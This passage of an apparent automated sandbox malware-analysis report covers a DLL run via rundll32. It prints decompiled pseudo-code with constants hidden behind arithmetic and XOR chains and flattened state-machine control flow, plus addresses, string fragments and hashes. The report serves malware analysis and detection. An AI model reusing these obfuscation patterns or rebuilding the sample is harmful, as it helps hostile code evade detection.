					}
					goto L6;
					L13:
				} while (_t157 != 0x3ab8f213);
				goto L6;
			}

0x1001cdd3
0x1001cdd7
0x1001cdd9
0x1001cddd
0x1001cddf
0x1001cde3
0x1001cde7
0x1001cde8
0x1001cde9
0x1001cdee
0x1001cdf6
0x1001cdf9
0x1001ce03
0x1001ce0b
0x1001ce0d
0x1001ce15
0x1001ce1a
0x1001ce29
0x1001ce2c
0x1001ce30
0x1001ce38
0x1001ce40
0x1001ce45
0x1001ce52
0x1001ce56
0x1001ce5e
0x1001ce66
0x1001ce6b
0x1001ce73
0x1001ce7b
0x1001ce83
0x1001ce8b
0x1001ce93
0x1001ce9b
0x1001cea3
0x1001ceab
0x1001ceb3
0x1001cebb
0x1001cec3
0x1001cecb
0x1001cecf
0x1001ced7
0x1001cedf
0x1001cee7
0x1001ceef
0x1001cef7
0x1001ceff
0x1001cf07
0x1001cf0f
0x1001cf1f
0x1001cf23
0x1001cf28
0x1001cf2d
0x1001cf35
0x1001cf3d
0x1001cf42
0x1001cf4a
0x1001cf56
0x1001cf59
0x1001cf5d
0x1001cf65
0x1001cf6d
0x1001cf75
0x1001cf7d
0x1001cf85
0x1001cf8a
0x1001cf92
0x1001cf9a
0x1001cfa4
0x1001cfb1
0x1001cfc1
0x1001cfc4
0x1001cfc8
0x1001cfcc
0x1001cfd4
0x1001cfd4
0x1001cfde
0x1001d057
0x1001d05c
0x1001d05e
0x1001d063
0x1001d065
0x00000000
0x1001d065
0x1001cfe0
0x1001cfe6
0x1001d02c
0x00000000
0x1001cfe8
0x1001cfee
0x00000000
0x1001cff4
0x1001d01a
0x1001d01f
0x1001cfee
0x1001cfe6
0x1001d023
0x1001d02b
0x1001d02b
0x1001d074
0x1001d07d
0x1001d082
0x1001d08e
0x00000000
0x1001d084
0x1001d084
0x00000000
0x1001d084
0x00000000
0x1001d093
0x1001d093
0x00000000

Strings

0V, xrefs: 1001CEB3
]b., xrefs: 1001CFE0
_2, xrefs: 1001CDEE
/, xrefs: 1001CF9A
]b., xrefs: 1001CE15

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: /$_2$0V$]b.$]b.
API String ID: 0-2210830570
Opcode ID: bb31032d2e2ee86c7c0b69b262f4d6c603d272611a24b6ff2f3b23f068030bec
Instruction ID: 48653eb64770e08f90b0effd2631becc7befea07c136a9e8f7f8472ce2e08f8d
Opcode Fuzzy Hash: bb31032d2e2ee86c7c0b69b262f4d6c603d272611a24b6ff2f3b23f068030bec
Instruction Fuzzy Hash: CD71447150D3429FD358CF61C84991FBBE2FBC8758F104A1DF5965A2A0C3B5CA4A8F86

Uniqueness

Uniqueness Score: -1.00%

Function 10017570, Relevance: 6.4, Strings: 5, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10017570(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				char _v584;
				void* _t176;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				signed int _t189;

				_v20 = 0x17f2;
				_t183 = 0x21;
				_v20 = _v20 / _t183;
				_v20 = _v20 + 0x6d93;
				_v20 = _v20 ^ 0xb3130aa6;
				_v20 = _v20 ^ 0xb31362a2;
				_v44 = 0x7846;
				_t184 = 0x2b;
				_v44 = _v44 / _t184;
				_v44 = _v44 | 0x2d637405;
				_v44 = _v44 ^ 0x2d633d3a;
				_v12 = 0x826a;
				_v12 = _v12 >> 6;
				_v12 = _v12 << 0xf;
				_v12 = _v12 + 0xfdce;
				_v12 = _v12 ^ 0x01053037;
				_v40 = 0xb008;
				_t185 = 9;
				_v40 = _v40 / _t185;
				_v40 = _v40 | 0xdff8508a;
				_v40 = _v40 ^ 0xdff82a49;
				_v16 = 0x97c9;
				_v16 = _v16 >> 6;
				_v16 = _v16 << 0xd;
				_t186 = 0x13;
				_v16 = _v16 / _t186;
				_v16 = _v16 ^ 0x0003c223;
				_v52 = 0xe117;
				_v52 = _v52 + 0xb465;
				_v52 = _v52 << 7;
				_v52 = _v52 ^ 0x00cab1cc;
				_v8 = 0x7d37;
				_v8 = _v8 ^ 0x8829a720;
				_v8 = _v8 << 0xa;
				_t187 = 0x5d;
				_v8 = _v8 * 0x3b;
				_v8 = _v8 ^ 0x950d599f;
				_v28 = 0xafcc;
				_v28 = _v28 / _t187;
				_v28 = _v28 << 1;
				_v28 = _v28 ^ 0x00004226;
				_v56 = 0x4900;
				_v56 = _v56 | 0xacb64693;
				_v56 = _v56 ^ 0xacb6052b;
				_v24 = 0xef8a;
				_v24 = _v24 + 0xf857;
				_v24 = _v24 ^ 0xfd20d672;
				_v24 = _v24 * 0x1d;
				_v24 = _v24 ^ 0xacc29ce3;
				_v48 = 0xd87;
				_v48 = _v48 | 0xb3f54364;
				_v48 = _v48 + 0xffff5c7b;
				_v48 = _v48 ^ 0xb3f4bccb;
				_v60 = 0x28ae;
				_v60 = _v60 + 0xfffff49f;
				_v60 = _v60 ^ 0x000001f3;
				_v36 = 0xf8cf;
				_v36 = _v36 ^ 0x7fa8aefd;
				_v36 = _v36 + 0xffff1020;
				_v36 = _v36 ^ 0x7fa70865;
				_v32 = 0x4e50;
				_t188 = 0xf;
				_v32 = _v32 * 0x79;
				_t189 = 6;
				_v32 = _v32 / _t188;
				_v32 = _v32 ^ 0x0002677d;
				_v64 = 0x2ab7;
				_v64 = _v64 / _t189;
				_v64 = _v64 ^ 0x00007a29;
				_t176 = E10001E13(_v20, _v44, _v12, _v40,  *0x100221b0 + 0x10);
				_t213 = _a4 + 0x2c;
				if(E1000D867(_a4 + 0x2c, _v16, _t176, _v52, _v8, _v28) != 0) {
					E1001DEE8(_v56,  &_v584, _v24, _t213, _a8, _v48);
					E10003CA0(_v60, _v36, _v32,  &_v584, _v64);
				}
				return 1;
			}

0x10017579
0x10017588
0x1001758d
0x10017592
0x10017599
0x100175a0
0x100175a7
0x100175b1
0x100175b6
0x100175bb
0x100175c2
0x100175c9
0x100175d0
0x100175d4
0x100175d8
0x100175df
0x100175e6
0x100175f0
0x100175f5
0x100175fa
0x10017601
0x10017608
0x1001760f
0x10017613
0x1001761a
0x1001761f
0x10017624
0x1001762b
0x10017632
0x10017639
0x1001763d
0x10017644
0x1001764b
0x10017652
0x1001765a
0x1001765b
0x1001765e
0x10017665
0x10017671
0x10017674
0x10017677
0x1001767e
0x10017685
0x1001768c
0x10017693
0x1001769a
0x100176a1
0x100176ac
0x100176af
0x100176b6
0x100176bd
0x100176c4
0x100176cb
0x100176d2
0x100176d9
0x100176e0
0x100176e7
0x100176ee
0x100176f5
0x100176fe
0x10017705
0x10017712
0x10017715
0x1001771d
0x1001771e
0x10017723
0x1001772a
0x10017736
0x10017739
0x10017755
0x10017763
0x10017779
0x1001778e
0x100177a6
0x100177ab
0x100177b5

Strings

:=c-, xrefs: 100175C2
7}, xrefs: 10017644
)z, xrefs: 10017739
&B, xrefs: 10017677
PN, xrefs: 10017705

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: &B$)z$7}$:=c-$PN
API String ID: 1586166983-136981183
Opcode ID: c149a1545c5a6f83b4e93e0c549a75000216febd44645262f1429a9ff698bb76
Instruction ID: 4c0853177137f9260245fdea803910a11f1a139b5b3783921c9f25fd3a1c4bd4
Opcode Fuzzy Hash: c149a1545c5a6f83b4e93e0c549a75000216febd44645262f1429a9ff698bb76
Instruction Fuzzy Hash: 59611471D0020EEBEF48CFE5D98A9EEBBB2FB44314F208059E411B6290D7B95A45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1000C6EF, Relevance: 6.4, Strings: 5, Instructions: 140
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E1000C6EF(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t105;
				intOrPtr* _t118;
				void* _t120;
				void* _t128;
				signed int _t129;
				signed int _t130;
				void* _t131;
				signed int* _t133;

				_push(_a20);
				_t131 = __edx;
				_t118 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t105);
				_v32 = 0x6ec3;
				_t133 =  &(( &_v48)[7]);
				_v32 = _v32 << 2;
				_v32 = _v32 >> 0xd;
				_t128 = 0;
				_v32 = _v32 ^ 0x00000124;
				_t120 = 0x2e625de7;
				_v20 = 0xd76a;
				_t129 = 5;
				_v20 = _v20 / _t129;
				_v20 = _v20 ^ 0x000055da;
				_v48 = 0x58a7;
				_v48 = _v48 + 0x6c8;
				_v48 = _v48 << 0xb;
				_v48 = _v48 << 9;
				_v48 = _v48 ^ 0xf6f0317b;
				_v36 = 0x5d19;
				_v36 = _v36 * 0x6c;
				_v36 = _v36 + 0xb738;
				_v36 = _v36 ^ 0x0027d757;
				_v24 = 0x73a3;
				_v24 = _v24 + 0x4f0f;
				_v24 = _v24 ^ 0x0000ed3d;
				_v44 = 0x403e;
				_v44 = _v44 ^ 0xd0448639;
				_v44 = _v44 + 0xffffdeb2;
				_v44 = _v44 << 4;
				_v44 = _v44 ^ 0x044a6664;
				_v16 = 0x1c10;
				_v16 = _v16 * 0x51;
				_v16 = _v16 ^ 0x0008f1ff;
				_v4 = 0x63b7;
				_v4 = _v4 << 0x10;
				_v4 = _v4 ^ 0x63b7360b;
				_v28 = 0x3e7f;
				_v28 = _v28 ^ 0x7d4cf8f0;
				_t130 = _v4;
				_v28 = _v28 * 0x2c;
				_v28 = _v28 ^ 0x89322d32;
				_v40 = 0xdd6b;
				_v40 = _v40 + 0xfc8c;
				_v40 = _v40 >> 0x10;
				_v40 = _v40 << 9;
				_v40 = _v40 ^ 0x0000558e;
				_v8 = 0x49f9;
				_v8 = _v8 + 0xfffff29f;
				_v8 = _v8 ^ 0x00000d42;
				_v12 = 0x318;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x0000321b;
				do {
					while(_t120 != 0xc7aef4e) {
						if(_t120 == 0x1f37240b) {
							_t130 = E10009A00(_v32, _t120, 0, _v20, _a16, 0, _a12, _v48, _t120, _v36, _v24, _t131);
							_t133 =  &(_t133[0xb]);
							if(_t130 == 0) {
								L7:
								return _t128;
							}
							_t120 = 0xc7aef4e;
							continue;
						}
						if(_t120 == 0x2e625de7) {
							_t120 = 0x1f37240b;
							continue;
						}
						if(_t120 != 0x32a206ac) {
							goto L14;
						}
						E10009A00(_v4, _t120, _t128, _v28, _a16, _t130, _a12, _v40, _t120, _v8, _v12, _t131);
						if(_t118 != 0) {
							 *_t118 = _t130;
						}
						goto L7;
					}
					_push(_t120);
					_t128 = E100157E8(_t130);
					if(_t128 == 0) {
						_t120 = 0x3ab8f213;
						goto L14;
					}
					_t120 = 0x32a206ac;
					continue;
					L14:
				} while (_t120 != 0x3ab8f213);
				goto L7;
			}

0x1000c6f6
0x1000c6fa
0x1000c6fc
0x1000c6fe
0x1000c702
0x1000c706
0x1000c70a
0x1000c70e
0x1000c70f
0x1000c710
0x1000c715
0x1000c71d
0x1000c720
0x1000c727
0x1000c72c
0x1000c72e
0x1000c736
0x1000c73b
0x1000c749
0x1000c74c
0x1000c750
0x1000c758
0x1000c760
0x1000c768
0x1000c76d
0x1000c772
0x1000c77a
0x1000c787
0x1000c78b
0x1000c793
0x1000c79b
0x1000c7a3
0x1000c7ab
0x1000c7b3
0x1000c7bb
0x1000c7c3
0x1000c7cb
0x1000c7d0
0x1000c7d8
0x1000c7e5
0x1000c7e9
0x1000c7f1
0x1000c7f9
0x1000c7fe
0x1000c806
0x1000c80e
0x1000c81b
0x1000c81f
0x1000c823
0x1000c82b
0x1000c833
0x1000c83b
0x1000c840
0x1000c845
0x1000c84d
0x1000c855
0x1000c85d
0x1000c865
0x1000c86d
0x1000c872
0x1000c87a
0x1000c87a
0x1000c88c
0x1000c90a
0x1000c90c
0x1000c911
0x1000c8d1
0x1000c8da
0x1000c8da
0x1000c913
0x00000000
0x1000c913
0x1000c894
0x1000c8db
0x00000000
0x1000c8db
0x1000c89c
0x00000000
0x00000000
0x1000c8c3
0x1000c8cd
0x1000c8cf
0x1000c8cf
0x00000000
0x1000c8cd
0x1000c925
0x1000c92d
0x1000c932
0x1000c93e
0x00000000
0x1000c93e
0x1000c934
0x00000000
0x1000c943
0x1000c943
0x00000000

Strings

]b., xrefs: 1000C736
B, xrefs: 1000C85D
>@, xrefs: 1000C7B3
=, xrefs: 1000C7AB
]b., xrefs: 1000C88E

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: =$>@$B$]b.$]b.
API String ID: 0-2184513905
Opcode ID: 7917007c32555daef5f93cb3609acba7d11e2b7698ae42c09df89798a5b82ff8
Instruction ID: e65ca6d1074f01d69a0b358cd156f112c6aca70ad4656599cc2acd5269c1bdd2
Opcode Fuzzy Hash: 7917007c32555daef5f93cb3609acba7d11e2b7698ae42c09df89798a5b82ff8
Instruction Fuzzy Hash: 7A516372008341ABE358CF61C88991FBBE1FBC8798F108A1DF59652260C7B5DA09DF97

Uniqueness

Uniqueness Score: -1.00%

Function 10009AE1, Relevance: 6.4, Strings: 5, Instructions: 133
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10009AE1(signed int __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v72;
				intOrPtr _v76;
				void* _t124;
				signed int _t130;
				signed int _t132;
				signed int _t133;
				intOrPtr* _t145;
				intOrPtr* _t148;
				intOrPtr* _t150;
				void* _t155;
				void* _t156;

				_t132 = __ecx;
				_t148 =  *0x10021400; // 0x0
				while(_t148 != 0) {
					if( *_t148 != 0) {
						 *((intOrPtr*)(_t148 + 0x1c))( *_t148, 0xb, 0);
					}
					_t148 =  *((intOrPtr*)(_t148 + 0x10));
				}
				_t133 = _t132 | 0xffffffff;
				_pop(_t149);
				_t156 = _t155 - 0x40;
				_v8 = 0x42f0c0;
				_t130 = _t133;
				_v4 = 0;
				_v32 = 0x6e16;
				_t145 = 0x10021400;
				_v32 = _v32 * 0x5a;
				_v32 = _v32 ^ 0x0026feb4;
				_v36 = 0x8b1c;
				_v36 = _v36 | 0xe0bb5784;
				_v36 = _v36 ^ 0xe0bbe7d8;
				_v44 = 0xb12;
				_v44 = _v44 ^ 0x7b8ee909;
				_v44 = _v44 >> 4;
				_v44 = _v44 ^ 0x07b8dae4;
				_v60 = 0xab64;
				_v60 = _v60 + 0xffff1f21;
				_v60 = _v60 ^ 0x0d405f68;
				_v60 = _v60 ^ 0x2b3fedb8;
				_v60 = _v60 ^ 0xd98056b3;
				_v64 = 0x7bd7;
				_v64 = _v64 * 0x50;
				_v64 = _v64 >> 8;
				_v64 = _v64 << 0xb;
				_v64 = _v64 ^ 0x0135cdcf;
				_v16 = 0xecab;
				_v16 = _v16 * 0x2d;
				_v16 = _v16 ^ 0x0029a0af;
				_v40 = 0xc18d;
				_v40 = _v40 + 0x35cc;
				_v40 = _v40 + 0x172a;
				_v40 = _v40 ^ 0x00011856;
				_v20 = 0xa565;
				_v20 = _v20 | 0x765f3394;
				_v20 = _v20 ^ 0x765fa4be;
				_v24 = 0xe1b9;
				_v24 = _v24 * 0x49;
				_v24 = _v24 ^ 0x00405f3b;
				_v48 = 0x2e03;
				_v48 = _v48 + 0xf77b;
				_v48 = _v48 ^ 0x50a91f1d;
				_v48 = _v48 ^ 0x34247e68;
				_v48 = _v48 ^ 0x648c5df0;
				_v12 = 0x6cf0;
				_v12 = _v12 + 0x5895;
				_v12 = _v12 ^ 0x0000ed40;
				_v52 = 0x996c;
				_v52 = _v52 + 0xd3f;
				_v52 = _v52 << 0xa;
				_v52 = _v52 ^ 0x4e95cfbf;
				_v52 = _v52 ^ 0x4c0f105b;
				_v56 = 0xb088;
				_v56 = _v56 + 0xffff7048;
				_v56 = _v56 >> 5;
				_v56 = _v56 * 0x1f;
				_v56 = _v56 ^ 0x00001ffc;
				_v28 = 0xa4f1;
				_v28 = _v28 + 0xacd;
				_v28 = _v28 ^ 0x0000afbe;
				_t150 =  *0x10021400; // 0x0
				while(_t150 != 0) {
					if( *_t150 == 0) {
						L10:
						 *_t145 =  *((intOrPtr*)(_t150 + 0x10));
						_t124 = E100091CD(_v48, _v12, _v52, _t150, _v56);
						_t156 = _t156 + 0xc;
					} else {
						_t124 = E10017CBC(_v32,  *((intOrPtr*)(_t150 + 4)), _t130, _v36);
						if(_t124 != _v28) {
							_t117 = _t150 + 0x10; // 0x10
							_t145 = _t117;
						} else {
							 *((intOrPtr*)(_t150 + 0x1c))( *_t150, 0, 0);
							E10018C8B(_v56, _v72, _v76,  *_t150);
							E100078F0( *((intOrPtr*)(_t150 + 4)), _v28, _v52, _v32, _v36);
							_t156 = _t156 + 0x14;
							goto L10;
						}
					}
					_t150 =  *_t145;
				}
				return _t124;
			}

0x10009ae1
0x10009ae2
0x10009afb
0x10009aed
0x10009af5
0x10009af5
0x10009af8
0x10009af8
0x10009aff
0x10009b02
0x10011e45
0x10011e48
0x10011e54
0x10011e56
0x10011e5a
0x10011e69
0x10011e6e
0x10011e72
0x10011e7a
0x10011e82
0x10011e8a
0x10011e92
0x10011e9a
0x10011ea2
0x10011ea7
0x10011eaf
0x10011eb7
0x10011ebf
0x10011ec7
0x10011ecf
0x10011ed7
0x10011ee4
0x10011ee8
0x10011eed
0x10011ef2
0x10011efa
0x10011f07
0x10011f0b
0x10011f13
0x10011f1b
0x10011f23
0x10011f2b
0x10011f33
0x10011f3b
0x10011f43
0x10011f4b
0x10011f58
0x10011f5c
0x10011f64
0x10011f6c
0x10011f74
0x10011f7c
0x10011f84
0x10011f8c
0x10011f94
0x10011f9c
0x10011fa4
0x10011fac
0x10011fb4
0x10011fb9
0x10011fc1
0x10011fc9
0x10011fd1
0x10011fd9
0x10011fe3
0x10011fe7
0x10011fef
0x10011ff7
0x10011fff
0x10012007
0x10012081
0x10012011
0x10012061
0x10012075
0x10012077
0x1001207c
0x10012013
0x1001201f
0x1001202a
0x1001208d
0x1001208d
0x1001202c
0x10012030
0x10012041
0x10012059
0x1001205e
0x00000000
0x1001205e
0x1001202a
0x1001207f
0x1001207f
0x1001208c

Strings

h~$4, xrefs: 10011F7C
;_@, xrefs: 10011F5C
h_@, xrefs: 10011EBF
@, xrefs: 10011F9C
?, xrefs: 10011FAC

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ;_@$?$@$h_@$h~$4
API String ID: 0-1313548790
Opcode ID: 19c60eb2fc9d772e2184e1397d5d84d04df9bbe5c21165f98c8c15ce99fbaf5a
Instruction ID: b19c1ca6e3d31d4d4ef9159ac445c0ba32e9153f74aa0842d826561c908fa0a9
Opcode Fuzzy Hash: 19c60eb2fc9d772e2184e1397d5d84d04df9bbe5c21165f98c8c15ce99fbaf5a
Instruction Fuzzy Hash: 46610EB55083419FE354CF21C48940BFBF1FB88798F505E1DF596662A0C3B5AA89CF86

Uniqueness

Uniqueness Score: -1.00%

Function 10007605, Relevance: 6.4, Strings: 5, Instructions: 127
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10007605() {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _t110;
				void* _t118;
				signed int _t120;
				signed int _t135;
				signed int _t136;
				short* _t137;
				signed int* _t140;

				_t140 =  &_v568;
				_v524 = _v524 & 0x00000000;
				_v528 = 0x1387ac;
				_t118 = 0x4e41429;
				_v552 = 0x9cc8;
				_v552 = _v552 * 0xb;
				_v552 = _v552 | 0x98122ffa;
				_v552 = _v552 ^ 0x9816c8f2;
				_v548 = 0xc79b;
				_v548 = _v548 << 5;
				_v548 = _v548 >> 6;
				_v548 = _v548 ^ 0x00001472;
				_v560 = 0x2de7;
				_t135 = 0xb;
				_v560 = _v560 / _t135;
				_v560 = _v560 >> 0xf;
				_v560 = _v560 | 0x0a536918;
				_v560 = _v560 ^ 0x0a532199;
				_v536 = 0x89b4;
				_v536 = _v536 + 0xffff0cb8;
				_v536 = _v536 ^ 0xffffc1bc;
				_v532 = 0xdd21;
				_v532 = _v532 + 0xb061;
				_v532 = _v532 ^ 0x0001daa7;
				_v564 = 0x77e3;
				_t136 = 0x1c;
				_v564 = _v564 * 0x76;
				_v564 = _v564 << 0xc;
				_v564 = _v564 + 0xffff5cda;
				_v564 = _v564 ^ 0x74296bf4;
				_v556 = 0x240d;
				_t110 = _v556 / _t136;
				_v556 = _t110;
				_v556 = _v556 + 0xcc42;
				_v556 = _v556 >> 7;
				_v556 = _v556 ^ 0x00001fe6;
				_v544 = 0x5b3d;
				_v544 = _v544 + 0xffffa256;
				_v544 = _v544 ^ 0xffff9726;
				_t137 = _v544;
				_v540 = 0x5d73;
				_v540 = _v540 + 0xffff95f2;
				_v540 = _v540 ^ 0xffff9ed1;
				L1:
				while(_t118 != 0x2493963) {
					if(_t118 == 0x4e41429) {
						_t118 = 0x2493963;
						continue;
					}
					if(_t118 == 0x95c6af5) {
						return E10015891(_t137,  *0x100221b0 + 0x10, _v556, _v544, _v540);
					}
					if(_t118 != 0x1ce20f0e) {
						L15:
						__eflags = _t118 - 0x278615fa;
						if(__eflags != 0) {
							continue;
						}
						return _t110;
					}
					_v568 = 0x3f77;
					_v568 = _v568 ^ 0x040fc81f;
					_t120 = 0x71;
					_v568 = _v568 / _t120;
					_v568 = _v568 >> 4;
					_v568 = _v568 ^ 0x00009342;
					_t137 =  &_v520 + E1001BBAB(_v536, _v532,  &_v520, _v564) * 2;
					while(1) {
						_t110 =  &_v520;
						if(_t137 <= _t110) {
							break;
						}
						__eflags =  *_t137 - 0x5c;
						if( *_t137 != 0x5c) {
							L8:
							_t137 = _t137 - 2;
							__eflags = _t137;
							continue;
						}
						_t94 =  &_v568;
						 *_t94 = _v568 - 1;
						__eflags =  *_t94;
						if( *_t94 == 0) {
							__eflags = _t137;
							L12:
							_t118 = 0x95c6af5;
							goto L1;
						}
						goto L8;
					}
					goto L12;
				}
				_t110 = E10008C0C(_v552, __eflags, _v548, _v560,  &_v520);
				_t140 =  &(_t140[3]);
				_t118 = 0x1ce20f0e;
				goto L15;
			}

0x10007605
0x1000760b
0x10007612
0x1000761a
0x1000761f
0x10007630
0x10007639
0x10007646
0x10007653
0x1000765b
0x10007660
0x10007665
0x1000766d
0x1000767b
0x10007680
0x10007686
0x1000768b
0x10007693
0x1000769b
0x100076a3
0x100076ab
0x100076b3
0x100076bb
0x100076c3
0x100076cb
0x100076d8
0x100076d9
0x100076dd
0x100076e2
0x100076ea
0x100076f2
0x100076fe
0x10007700
0x10007704
0x1000770c
0x10007711
0x10007719
0x10007721
0x10007729
0x10007731
0x10007735
0x1000773d
0x10007745
0x00000000
0x1000774d
0x1000775b
0x100077e1
0x00000000
0x100077e1
0x10007763
0x00000000
0x1000782d
0x1000776b
0x10007803
0x10007803
0x10007809
0x00000000
0x00000000
0x00000000
0x10007809
0x10007771
0x1000777b
0x10007789
0x1000778c
0x10007794
0x10007799
0x100077b9
0x100077cd
0x100077cd
0x100077d3
0x00000000
0x00000000
0x100077be
0x100077c2
0x100077ca
0x100077ca
0x100077ca
0x00000000
0x100077ca
0x100077c4
0x100077c4
0x100077c4
0x100077c8
0x100077d7
0x100077da
0x100077da
0x00000000
0x100077da
0x00000000
0x100077c8
0x00000000
0x100077d5
0x100077f9
0x100077fe
0x10007801
0x00000000

Strings

w?, xrefs: 10007771
=[, xrefs: 10007719
$, xrefs: 100076F2
s], xrefs: 10007735
w, xrefs: 100076CB

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $$=[$s]$w?$w
API String ID: 0-3700477970
Opcode ID: 62ff0d1c6547e0b70e078bd31fc65c68330c9ee5d58cb8db6e1cf70575695e7b
Instruction ID: 1a6987bc6c1846451349bb2a40725533db3d3377cb45e9f1ccf3a4716e170320
Opcode Fuzzy Hash: 62ff0d1c6547e0b70e078bd31fc65c68330c9ee5d58cb8db6e1cf70575695e7b
Instruction Fuzzy Hash: DC51497190C3429FE364CF25D44941FBBE1FBC4798F104A1EF599662A4D3B89A49CF82

Uniqueness

Uniqueness Score: -1.00%

Function 100094EC, Relevance: 5.2, Strings: 4, Instructions: 209
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E100094EC() {
				char _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				short* _t218;
				void* _t223;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t270;
				void* _t272;

				_t272 = (_t270 & 0xfffffff8) - 0x258;
				_v552 = 0xc5de;
				_v552 = _v552 << 0xb;
				_t223 = 0x10e191ba;
				_v552 = _v552 * 0xa;
				_v552 = _v552 ^ 0x3dd55649;
				_v528 = 0xd7a0;
				_v528 = _v528 ^ 0xb5a30bcc;
				_v528 = _v528 ^ 0xb5a3bef7;
				_v576 = 0xa7dd;
				_v576 = _v576 << 0xe;
				_t258 = 0x27;
				_v576 = _v576 / _t258;
				_v576 = _v576 ^ 0x011311a2;
				_v588 = 0x76f2;
				_v588 = _v588 | 0xcad6357e;
				_v588 = _v588 ^ 0x58bbddc5;
				_v588 = _v588 ^ 0x926db7d7;
				_v604 = 0x542d;
				_v604 = _v604 ^ 0xdabf7200;
				_v604 = _v604 | 0x518ac0ce;
				_v604 = _v604 + 0xffff5d7d;
				_v604 = _v604 ^ 0xdbbf6591;
				_v536 = 0x6f2;
				_v536 = _v536 ^ 0xb7ff586a;
				_v536 = _v536 ^ 0xb7ff59fe;
				_v564 = 0x9bc0;
				_t259 = 0x60;
				_v564 = _v564 * 0x77;
				_v564 = _v564 + 0xffff74e2;
				_v564 = _v564 ^ 0x0047e104;
				_v556 = 0xec1b;
				_v556 = _v556 * 0x26;
				_v556 = _v556 >> 3;
				_v556 = _v556 ^ 0x0004652b;
				_v568 = 0x50db;
				_v568 = _v568 / _t259;
				_v568 = _v568 << 8;
				_v568 = _v568 ^ 0x0000bb9e;
				_v540 = 0x45e;
				_t260 = 0x2a;
				_v540 = _v540 / _t260;
				_v540 = _v540 ^ 0x00003856;
				_v600 = 0xdcf5;
				_v600 = _v600 >> 0xb;
				_t261 = 0x55;
				_v600 = _v600 / _t261;
				_v600 = _v600 + 0xffff3d4e;
				_v600 = _v600 ^ 0xffff3115;
				_v544 = 0xeb2c;
				_v544 = _v544 | 0xbe9f19ff;
				_v544 = _v544 ^ 0xbe9ffb48;
				_v560 = 0x6b9e;
				_v560 = _v560 | 0x0e8ada92;
				_v560 = _v560 + 0xfffff2fa;
				_v560 = _v560 ^ 0x0e8af134;
				_v572 = 0xb259;
				_v572 = _v572 ^ 0x7ea6fcad;
				_v572 = _v572 * 0x50;
				_v572 = _v572 ^ 0x93f8b0e2;
				_v596 = 0x3f12;
				_t262 = 0x14;
